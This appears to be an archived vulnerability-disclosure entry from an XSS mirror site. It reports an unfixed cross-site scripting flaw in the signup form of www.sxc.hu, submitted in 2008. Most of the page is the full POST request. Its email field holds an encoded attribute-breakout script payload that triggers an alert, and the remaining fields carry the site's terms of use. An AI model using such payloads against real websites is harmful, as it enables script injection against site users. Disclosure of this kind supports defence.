| 
 
| Security researcher Uber0n, has submitted on 13/02/2008 a cross-site-scripting (XSS) vulnerability affecting www.sxc.hu, which at the time of submission ranked 1051 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 03/04/2008. It is currently unfixed.
 If you believe that this security issue has been corrected, please send us an e-mail.
 |  
              | Date submitted: 13/02/2008 | Date published: 03/04/2008 | Fixed? Mail us! | Status:  UNFIXED |  
| Author: Uber0n | Domain: www.sxc.hu | Category: XSS | Pagerank: 1051 | 
|---|
 
 
| URL: http://www.sxc.hu/index.phtml |  
 
| POST: login=&pass=&passc=&email=%22%3E%27%3E%3CScRiPt%3Ealert%28123%29%3C%2FsCrIpT%3E%22%27&emailc=&firstn ame=&lastname=&company=&phone=&street1=&street2=&street3=&city=&state=&country=&zip=&=TERMS+OF+USE%0 D%0A%0D%0ALast+updated%3A+29+Dec%2C+2005%0D%0A%0D%0AThe+following+is+a+legal+agreement+between+You+a nd+the+owners+and+operators+of+SXC.hu+%28%22Website%22%29%2C+HAAP+Media+Ltd.+%28%22SXC%22%2C+%22We%2 2%29.+By+using+the+Website+You+agree+to+be+bound+by+the+terms+of+this+Agreement.+If+You+do+not+agree +with+the+Terms+of+use%2C+please+do+not+use+the+Website.%0D%0A%0D%0AThis+agreement+may+be+revised+or +updated+without+notice.+You+are+advised+to+review+it+regularly.+Details+on+updates+can+be+found+at+ the+beginning+of+this+document.%0D%0A%0D%0A%0D%0AThe+use+of+this+Website%0D%0A%0D%0AYou+warrant+that +You+are+of+legal+age+to+use+the+Website+and+to+create+binding+legal+obligations+for+any+liability+Y ou+may+incur+as+a+result+of+the+use+of+the+Website.+You+agree+that+You+are+responsible+for+all+of+yo ur+use+of+the+site+including+for+the+use+of+your+account+by+others.%0D%0A%0D%0AThe+Website+contains+ images+uploaded+by+its+members.+All+images+and+their+descriptions+and+presentation+in+general+%28%22 Images%22%29+on+the+Website+are+the+property+of+either+SXC+and%2For+its+members+and+are+protected+by +international+copyright+laws.+Use+of+these+Images+without+license+is+prohibited.%0D%0A%0D%0ASXC+and +its+members+do+their+best+to+provide+accurate+information+on+Images+and+on+the+services+of+the+Webs ite%2C+however+against+all+our+efforts+there+can+be+some+typographical+and+technical+errors+on+it.+S XC+cannot+be+held+liable+for+any+losses+or+damages+resulting+from+the+inaccurary+of+any+information+ on+the+Website.%0D%0A%0D%0A%0D%0AUploading+Images%0D%0A%0D%0ABoth+parties+acknowledge+that+from+time +to+time+You+may+upload+photographs+or+graphics+to+the+Website%2C+and+SXC+will+screen+these+uploads+ to+see+if+they+are+suitable+for+distribution.+The+policies+behind+this+procedure+are+described+in+th e+Upload+rules+section+of+the+Help.%0D%0A%0D%0AYou+authorize+SXC+to+be+your+non-exclusive+agent+that +licenses+Images+FOR+FREE+to+third+parties+based+on+the+terms+that+can+be+found+the+Image+License+Ag reement+alongside+the+restrictions+specified+at+each+Image.+SXC+agrees+not+to+sell+these+Images+unde r+any+circumstances+and+not+to+distribute+them+outside+the+Website.%0D%0A%0D%0AYou+acknowledge+that+ under+no+circumstances+can+you+demand+money+from+SXC+or+those+using+the+Images+for+the+use+of+said+I mages.+You+you+may+ask+payment+for+a+higher+resolution+version+of+an+Image+but+only+if+it%27s+not+st ored+on+the+Website.%0D%0A%0D%0AYou+also+acknowledge+that+the+Images+may+be+used+for+promotional+pur poses+for+the+Website+or+your+gallery+on+SXC.%0D%0A%0D%0AFurthermore%2C+You+acknowledge+that+SXC+doe s+not+allow+the+upload+of+Images+that+infringe+on+any+copyright%2C+property+right%2C+trademark+or+an y+other+applicable+right.%0D%0A%0D%0AYou+are+solely+responsible+for+the+Images+You+upload.+You+warra nt+that+You+own+all+proprietary+rights+regarding+the+Image%2C+and+as+for+Images+depicting+identifiab le+persons+that+You+do+your+best+to+obtain+a+valid%2C+legal+and+signed+Model+release+from+those+part ies+to+upload+alongside+the+Image.%0D%0A%0D%0AYou+acknowledge+that+even+though+We+do+our+best+to+pre vent+it+from+happening%2C+SXC+cannot+be+held+responsible+for+the+misuse+or+abuse+of+any+Image.%0D%0A %0D%0AWe+also+reserve+the+right+to+remove+any+approved+Image+at+any+time+if+We+believe+it%27s+defect ive%2C+of+poor+quality+or+infringe+on+any+right.+Serious+copyright+infringement+issues+such+as+uploa ding+Images+found+on+other+stock+photography+sites+result+in+the+termination+of+this+Agreement%2C+th e+termination+of+your+membership%2C+and+possible+criminal+prosecution.%0D%0A%0D%0A%0D%0ATermination% 0D%0A%0D%0ABoth+parties+can+terminate+your+membership+account+for+any+reason+with+a+written+notice+a nd+proof+of+identity.+Upon+termination+SXC+removes+all+your+Images+from+the+Website.+You+acknowledge +that+because+of+copyright+infringement+or+other+kinds+of+serious+-+or+even+malicious+-+acts%2C+you+ may+face+more+serious+consequences.%0D%0A%0D%0A%0D%0APrivacy+policy%0D%0A%0D%0ASXC+collects+some+inf ormation+about+its+users+for+statistical+and+contact+purposes.+SXC+holds+your+data+confidentially%2C +it+will+not+be+sold+to+any+third+parties+and+it+will+not+be+seen+by+the+public.+Each+member+of+the+ Website+has+a+user+profile+and+gallery+page%2C+on+which+your+full+name+and+location+%28city%2C+state %2C+country%29+may+be+visible.+If+You+do+not+wish+to+share+this+information+with+the+public+You+may+ hide+them+at+any+time.%0D%0A%0D%0A%0D%0AIndemnification%0D%0A%0D%0AYou+agree+to+indemnify%2C+defend% 2C+and+hold+harmless+SXC+and+its+officers%2C+employees%2C+shareholders%2C+directors+and+suppliers+ag ainst+all+claims%2C+liability%2C+damages%2C+costs+and+expenses%2C+including+reasonable+legal+fees+an d+expenses%2C+arising+out+of+or+related+to+a+breach+of+this+Agreement%2C+the+use+of+this+site+and+th e+use+or+the+inability+of+use+of+any+Image%2C+your+failure+to+abide+by+any+restriction+regarding+the +use+of+an+Image%2C+or+any+claim+by+a+third+party+related+to+the+use+of+an+Image.%0D%0A%0D%0A%0D%0AW arranty+and+Liability%0D%0A%0D%0ATHE+WEBSITE+AND+THE+IMAGES+ARE+PROVIDED+%22AS+IS%22.+WE+OFFER+NO+WA RRANTY%2C+EXPLICIT+OR+IMPLIED%2C+REGARDING+ANY+IMAGES%2C+THE+WEBSITE%2C+THE+ACCURACY+OF+ANY+INFORMAT ION%2C+OR+ANY+RIGHTS+OR+LICENSES+UNDER+THIS+AGREEMENT+INCLUDING%2C+WITHOUT+LIMITATION%2C+ANY+IMPLIED +WARRANTIES+OF+MERCHANTABILITY+OR+FITNESS+FOR+A+PARTICULAR+PURPOSE.+SXC+DOES+NOT+REPRESENT+OR+WARRAN T+THAT+THE+WEBSITE+OR+THE+IMAGES+WILL+MEET+YOUR+REQUIREMENTS+OR+THAT+THEIR+USE+WILL+BE+UNINTERRUPTED +OR+ERROR+FREE.%0D%0A%0D%0ASXC+SHALL+NOT+BE+LIABLE+TO+YOU+OR+TO+ANY+OTHER+PERSON+OR+ENTITY+FOR+ANY+G ENERAL%2C+PUNITIVE%2C+SPECIAL%2C+INDIRECT%2C+CONSEQUENTIAL+OR+INCIDENTAL+DAMAGES%2C+OR+LOST+PROFITS+ OR+ANY+OTHER+DAMAGES%2C+COSTS+OR+LOSSES+ARISING+OUT+OF+YOUR+USE+OF+THE+WEBSITE+OR+THE+IMAGES.&f=sign up_check&x=27&y=4 |  
| Click here to view the mirror |  
|  |  |